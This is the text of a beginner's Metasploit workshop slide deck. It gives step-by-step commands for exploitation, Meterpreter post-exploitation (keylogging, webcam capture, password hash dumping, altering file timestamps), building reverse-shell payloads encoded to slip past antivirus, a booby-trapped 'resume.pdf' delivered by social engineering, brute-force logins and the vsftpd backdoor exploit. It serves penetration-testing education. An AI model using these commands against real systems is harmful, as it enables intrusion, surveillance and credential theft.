Metasploit Humla for Beginner

By : Ajay Srivastava

Please don’t expect …. How to evade antiviruses (antivirus evasion)

How to do pivoting

How to do port forwarding

How to write your own metasploit module

Disclaimer

All the information or technique you will be learning here is for educational purpose and should not be used for malicious activities.

Agenda Introduction

Basics of Metasploit

Information gathering

Exploitation

( 11:30-11:45 - Break 1/ Tea )*

Meterpreter Basics

Post exploitation using meterpreter

Meterpeter scripts

( 1:00 – 2:00 - Break 2 / Lunch )*

Agenda Metasploit utilities

Client-side exploitation

( 4:00-4:20 – Break 3 / Tea )*

Auxiliary module

And we are done

* Lunch and Tea are self sponsored.

Introduction It’s not a Tool, it’s a Framework !!!

History Developed by H.D Moore in 2003

Originally written in Perl & later on rewritten in Ruby

Acquired by Rapid7 in 2009

Remains open source & free for use

Metasploit Architecture

Libraries Rex :

The basic library for most tasks

Handles sockets and protocols

MSF CORE : Defines the Metasploit Framework

Provides the ‘basic’ API

MSF BASE : Provides the ‘friendly’ API

Provides simplified APIs for use in the Framework

Modules Exploit

Modules used for actually attacking the systems and grabbing the access.

Payload Piece of code which executes on remote system after

successful exploitation.

Auxiliary Exploit without payload. Used for scanning, fuzzing &

doing various tasks.

Modules Encoders

Program which encodes our payload to avoid antivirus detection

Nops

Used to keep payload size consistent

Payloads Single

Completely standalone

eg: Add user

Stagers Creates the network connection

Stages Downloaded by the stagers

eg: Meterpreter

Payloads Payload is staged if represented by ‘/’ in the payload

name

Windows/shell_bind_tcp

single payload with no stage

Windows/shell/bind_tcp

a stager (bind_tcp)

a stage (shell)

Interfaces MSFCONSOLE

MSFCLI

MSFWEB

Armitage

MSFCONSOLE Most powerful interface among all interfaces

MSFCLI

MSFWEB

Armitage Graphical version of Metasploit

Developed by Raphel Mudge

Supports both GUI & CLI

Armitage

Basics Commands #msfconsole

#msfupdate

MSFConsole commands are classified in two types :

Core Commands

Database commands

Core Commands help or ?

banner

version

show

search msf>search <module name>

info msf>info <module name>

use msf>use <exploit/auxiliary name>

Core Commands back

show options

set msf>set <option> <value>

setg msf>set <option> <value>

unset msf>set <option> <value>

unsetg msf>set <option> <value>

Core Commands show payloads

set payload

msf>set payload <payload name>

check

exploit

run

Database Commands Default database : PostgreSQL

Database.yml

/opt/metasploit/apps/pro/ui/config/database.yml

# cat database.yml

db_status

db_disconnect

Database Commands Db_connect

#db_connect

user:pass@localhost:port/dbname

OR

#db_connect –y <path of database.yml>

Database Commands db_nmap

# db_nmap –sV –A –O <ip range>

hosts

# hosts –h

services

# services

Database Commands vulns

db_export

db_import

db_rebuild_cache

creds

db_load

db_unload

Information Gathering Auxiliary modules are the best !!!

Will cover in detail later

Using auxiliary/scanner/portscan/tcp

# msf>auxiliary/scanner/portscan/tcp

Or

nmap <switches> <ip address>

Exploitation To list available exploits :

msf> search <exploit name>

To select an exploit : msf> use <exploit name>

To get information about selected exploits msf/exploitname> info

To check the options and set arguments msf/exploitname> show options

To set the target host msf/exploitname> set rhost <victim ip>

Exploitation To list supported payload with selected exploit

msf/exploitname> show payloads

To set the payload msf/exploitname> set payload <payload name>

To set attacker machine msf/exploitname> Set lhost <own ip>

To check if target is vuln to selected exploit msf/exploitname> Check

To launch the attack msf/exploitname> exploit

Meterpreter Post exploitation module

Runs in the exploited process context

Runs in memory and doesn’t create any file on disk

Encrypted communication

Stable and extensible

Meterpreter Classification

Core commands

File system commands

System commands

User interface commands

Priv commands

Networking commands

Meterpreter : Core commands background

sessions

ps

migrate

bgrun/bglist/bgkill

resource

Meterpreter : Core commands Run

#msf>run <script name>

Channel

#msf>execute –f <program> -c

Use

#msf>use <extension name>

Meterpreter:File System Commands pwd

cd

getlwd/getlcd

ls

cat/edit

download/upload

Meterpreter:File System Commands search

#msf>search –d <directory> -f *.<fileformat> -r

mkdir/rmdir

rm/rmdir

del

Meterpreter : System Commands sysinfo

getpid/getuid

shell

reboot

shutdown

ps

Meterpreter : UI Commands User interface & Webcam commands

idletime

keyscan_start

keyscan_dump

keyscan_stop

webcam_list

webcam_snap

Meterpreter : Privs Commands getsystem

hashdump

timestomp timestomp –h

timestomp <filepath> -v { to display all atributes}

timestomp <filepath> -c <MM/DD/YYYY H:M:S>

Meterpreter: Networking commands arp

ipconfig/ifconfig

netstat

route

portfwd

Meterpreter scripts Path :

/usr/share/metasploit-framework/scripts/meterpreter

Or

meterpreter>run <tab multiple times>

Meterpreter scripts

run <script name>

run checkvm

run credcollect

run keylogrecorder

run winenum

run getcountermeasure

run getgui

Meterpreter scripts

run scraper

run hostedit

run gettelnet

run arpscanner

run vnc

run filecollector #msf>run filecollector –d <dnm> -f *.txt -r

Metasploit Utilities Three main utilities to generate shellcode and to evade

antiviruses

Msfpayload

Msfencode

Msfvenom

Msfpayload To generate payload in different formats as exe ,C , Ruby and

javascript

Using msfpayload : root@kali:~# msfpayload -h

To check options root@kali:~# msfpayload <payload name> O

root@:~# msfpayload

windows/meterpreter/reverse_tcp O

Setting the options root@kali:~# msfpayload

windows/meterpreter/reverse_tcp LHOST=<attacker

ip> LPORT=4422 X > exploit.exe

Sending this exploit.exe to victim

Using Mutli-handler Exploit / setting listener Setup listner:

msf > search multi/handler

msf > use exploit/multi/handler

msf exploit(handler) > set payload

windows/meterpreter/reverse_tcp

msf exploit(handler) > show options

msf exploit(handler) > set lhost

<attacker ip>

msf exploit(handler) > set lport 4422

msf exploit(handler) > exploit

MSFEncode To bypass antiviruses

Alters code , by converting into binary EXE. While interacting back , it will decode and execute the same into memory.

Payload is encoded by different encoders

MSFEncode root@kali:~# msfencode -h

Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>

OPTIONS:

-e <opt> The encoder to use

-c <opt> The number of times to encode the data

-t <opt> The output format: bash,c,java,perl,pl,py,python,raw,sh,vbscript,asp,aspx,exe

-x <opt> Specify an alternate executable template

-k Keep template working; run payload in new thread (use with -x)

MSFEncode list encoders:

root@kali:~# msfencode –l

msfencode with msfpayload:

root@kali:~# msfpayload

windows/meterpreter/reverse_tcp

LHOST=<attacker ip> LPORT=4422 R |

msfencode -e x86/shikata_ga_nai -c 8 -t

exe > /var/www/exploitbypass.exe

Client-side Attacks Difficult to find server-side vulnerabilities

Most enterprises have incoming connections locked down with firewalls

Client-side attacks are the most common ones:

- Browser based attacks

- Social engineering attacks using malicious link or file

Client-side Attacks:Browser based Using IE 6 based Aurora exploit

msf > search aurora

msf > use exploit/windows/browser/ms10_002_aurora

msf exploit(ms10_002_aurora) > show options

msf exploit(ms10_002_aurora) > set srvhost

<attacker ip>

msf exploit(ms10_002_aurora) > set srvport 80

msf exploit(ms10_002_aurora) > set uripath /test

Client-side Attacks:Browser based msf exploit(ms10_002_aurora) > show options

msf exploit(ms10_002_aurora) > set payload

windows/meterpreter/reverse_tcp

msf exploit(ms10_002_aurora) > show options

msf exploit(ms10_002_aurora) > set lhost <own

ip>

msf exploit(ms10_002_aurora) > set lport 443

msf exploit(ms10_002_aurora) > exploit

Client-side Attacks:File Format Nowadays file format based exploits are exploiting

targets in wild.

File formats such as pdf , doc or rtf are sent as attachment to the victim and expected to open it. For eg:

Adobe util.printf() Bufferoverflow vulnerability

MS14-017 Microsoft Word RTF Object Confusion

Client-side Attacks:File Format Exploiting Adobe util.printf() Bufferoverflow vulnerability

msf > search adobe_utilprintf

msf > use

exploit/windows/fileformat/adobe_utilprintf

msf exploit(adobe_utilprintf) > set filename

resume.pdf

msf exploit(adobe_utilprintf) > show options

msf exploit(adobe_utilprintf) > set payload

windows/meterpreter/reverse_tcp

Client-side Attacks:File Format msf exploit(adobe_utilprintf) > setg

lhost <attacker ip>

msf exploit(adobe_utilprintf) > set

lport 443

msf exploit(adobe_utilprintf) > exploit

Setup listener(i.e multi/handler)

Send this resume.pdf using some social engineering techniques.

Client-side Attacks:File Format Setting up listener on local machine :

msf > search multi/handler

msf > use exploit/multi/handler

msf exploit(handler) > show options

msf exploit(handler) > set lhost <own

ip>

msf exploit(handler) > set lport 443

msf exploit(handler) > exploit

Auxiliary Modules Pre-exploitation module

Port scanners, fuzzers, banner grabbers, brute-force module etc.

Path:

/usr/share/metasploit-framework/modules/auxiliary

or

Using show auxiliary on msfconsole :

msf > show auxiliary

Used without payloads

Auxiliary Modules Used same as exploits but without payload

msf> use <auxiliary name>

‘run’ command instead of ‘exploit’ command

RHOSTS instead of RHOST

Auxiliary Modules : Port scanners Portscanner auxiliary module used for port scanning

Using portscanners : msf > search portscan

msf > use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > show options

msf auxiliary(tcp) > set rhosts <target>

msf auxiliary(tcp) > set ports 1-100

msf auxiliary(tcp) > set threads 10

msf auxiliary(tcp) > run

Auxiliary Modules : SMB version fingerprinting

msf > search smb_version

msf > use auxiliary/scanner/smb/smb_version

msf auxiliary(smb_version) > show options

msf auxiliary(smb_version) > set rhosts

192.168.37.0/24

msf auxiliary(smb_version) > set threads 10

msf auxiliary(smb_version) > run

Auxiliary Modules : Version Scanner Banner grabbing of MySQL server :

msf > search MySQL

msf > use auxiliary/scanner/mysql/mysql_version

msf auxiliary(mysql_version) > show options

msf auxiliary(mysql_version) >set rhosts

<target>

msf auxiliary(mysql_version) > run

Auxiliary Modules: Login Scanners Testing login attack on MySQL :

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > show options

msf auxiliary(mysql_login) > setg rhosts

<target>

msf auxiliary(mysql_login) > set user_file

userfile.txt

Auxiliary Modules: Login Scanners

msf auxiliary(mysql_login) > set pass_file

passfile.txt

msf auxiliary(mysql_login) > set stop_on_success

true

msf auxiliary(mysql_login) > run

Auxiliary Modules : Telnet msf > search telnet_login

msf > use auxiliary/scanner/telnet/telnet_login

msf auxiliary(telnet_login) > show options

msf auxiliary(telnet_login)) > setg rhosts

<target ip>

msf auxiliary(telnet_login) > set user_file

userfile.txt

Auxiliary Modules : Telnet msf auxiliary(telnet_login) > set

pass_file passfile.txt

msf auxiliary(telnet_login) > set

stop_on_success true

msf auxiliary(telnet_login) > run

Verify:

root@kali:~# telnet <target ip>

Auxiliary Modules : Attacking FTP msf > search ftp_version

msf > use auxiliary/scanner/ftp/ftp_version

msf auxiliary(ftp_version) > show options

msf auxiliary(ftp_version) > set rhosts <target>

msf auxiliary(ftp_version) > run

Result on metasploitable2: FTP Banner: '220 (vsFTPd 2.3.4)

Auxiliary Modules : Attacking FTP Now checking for ftp login

msf > search ftp_login

msf > use auxiliary/scanner/ftp/ftp_login

msf auxiliary(ftp_login) > set rhosts <target

ip>

msf auxiliary(ftp_login) > set user_file

userfile.txt

msf auxiliary(ftp_login) > set pass_file

passfile.txt

msf auxiliary(ftp_login) > set stop_on_success

true

msf auxiliary(ftp_login) > run

Successful FTP login for 'msfadmin':'msfadmin'

Auxiliary Modules : Attacking FTP From FTP version scan we know its version is vsFTPd

2.3.4

Now looking for exploit of this FTP version msf > search vsFTPd 2.3.4

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf exploit(vsftpd_234_backdoor) > show options

msf exploit(vsftpd_234_backdoor) > set rhost

<target ip>

msf exploit(vsftpd_234_backdoor) > show payloads

msf exploit(vsftpd_234_backdoor) > set payload

cmd/unix/interact

msf exploit(vsftpd_234_backdoor) > exploit

References Metasploit Guide,

http://packetstormsecurity.com/files/119280,

Securitytube Metasploit Framework Expert (SMFE course by Vivek Ramachandran)

Metasploit Unleashed ,

http://www.offensive-security.com/metasploit-unleashed/Main_Page